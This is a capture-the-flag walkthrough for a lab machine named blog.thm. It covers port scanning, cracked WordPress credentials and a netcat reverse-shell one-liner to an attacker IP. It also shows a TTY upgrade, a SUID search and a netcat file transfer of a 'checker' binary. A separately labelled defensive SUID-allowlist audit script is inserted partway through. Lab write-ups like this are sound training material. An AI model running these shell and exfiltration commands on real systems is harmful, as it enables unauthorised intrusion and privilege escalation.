Target Information
- IP Address: 10.10.174.172
- Domain: blog.thm
- Operating System: Ubuntu 18.04.4 LTS (Bionic Beaver)
- Kernel: Linux 4.15.0-101-generic
NMAP Scan Results
PORT | STATE | SERVICE | VERSION |
---|---|---|---|
22/tcp | open | ssh | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) |
80/tcp | open | http | Apache httpd 2.4.29 ((Ubuntu)) |
139/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
445/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
Ports Priority
PORT 80
- CMS: WordPress 5.0 (Confirmed)
- Credentials:
  - [SUCCESS]: kwheel / cutiepie1 (Found By Rockyou.txt)
RCE (Remote Code Execution)
Reverse Shell (URL Encoded)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.69.221 4444 >/tmp/f
PORTS 139,445 (Rabbit Hole)
Full TTY
python -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo;fg;reset
export TERM=linux
Privilege Escalation
Identify SUID Binary
find / -perm /4000 -type f 2>/dev/null
Identified Binary: /usr/sbin/checker
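A defender's counterpart to the `find` sweep above, as an added example that is not part of the original write-up: it compares the SUID files on a host against a reviewed allowlist so that a non-stock binary such as `/usr/sbin/checker` is reported. The function name `audit_suid` and the one-path-per-line allowlist format are assumptions.

```shell
#!/bin/sh
# Added example (not from the original write-up).
# Assumed allowlist format: one absolute path per line. Lines that are not
# an exact path (comments, blanks) simply never match anything.

# audit_suid ROOT ALLOWLIST
#   Prints "UNEXPECTED <path>" for every SUID regular file under ROOT that
#   is not listed in ALLOWLIST.
#   Returns 0 = nothing unexpected, 1 = findings, 2 = allowlist unreadable.
audit_suid() {
    [ -r "$2" ] || { echo "audit_suid: cannot read allowlist $2" >&2; return 2; }
    # -perm -4000 is the POSIX spelling and selects the same files as the
    # write-up's "-perm /4000". -xdev keeps the walk on one filesystem.
    # find exits non-zero on unreadable directories; keep the results anyway.
    _suid_report=$(
        find "$1" -xdev -type f -perm -4000 -exec sh -c '
            allow=$1; shift
            for f in "$@"; do
                # -x whole line, -F literal: no regex or substring matches
                grep -qxF -- "$f" "$allow" || printf "UNEXPECTED %s\n" "$f"
            done
        ' sh "$2" {} + 2>/dev/null
    ) || :
    if [ -z "$_suid_report" ]; then
        return 0
    fi
    printf '%s\n' "$_suid_report"
    return 1
}

# Constructed demo: a throwaway tree with one reviewed and one unreviewed
# SUID file. Run as: sh suid_audit.sh demo
if [ "${1:-}" = demo ]; then
    t=$(mktemp -d)
    mkdir -p "$t/usr/bin" "$t/usr/sbin"
    : > "$t/usr/bin/passwd"; : > "$t/usr/sbin/checker"
    chmod 4755 "$t/usr/bin/passwd" "$t/usr/sbin/checker"
    printf '%s\n' "$t/usr/bin/passwd" > "$t/allow"
    audit_suid "$t" "$t/allow"   # reports only $t/usr/sbin/checker
    rm -rf "$t"
fi
```

Run against `/` from a scheduled job and alert on exit status 1; every new entry in the allowlist should correspond to a binary someone has actually reviewed.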
Transfer Checker Binary
On Attacker Machine:
nc -lvvp 7777 > checker
On Target Machine:
nc 192.168.56.123 7777 < checker
Decompile Checker Binary
- Analyze the binary using Ghidra.
Set Custom Variable
Execute Checker Binary
Note: Understand the binary's behavior before execution.
Pwned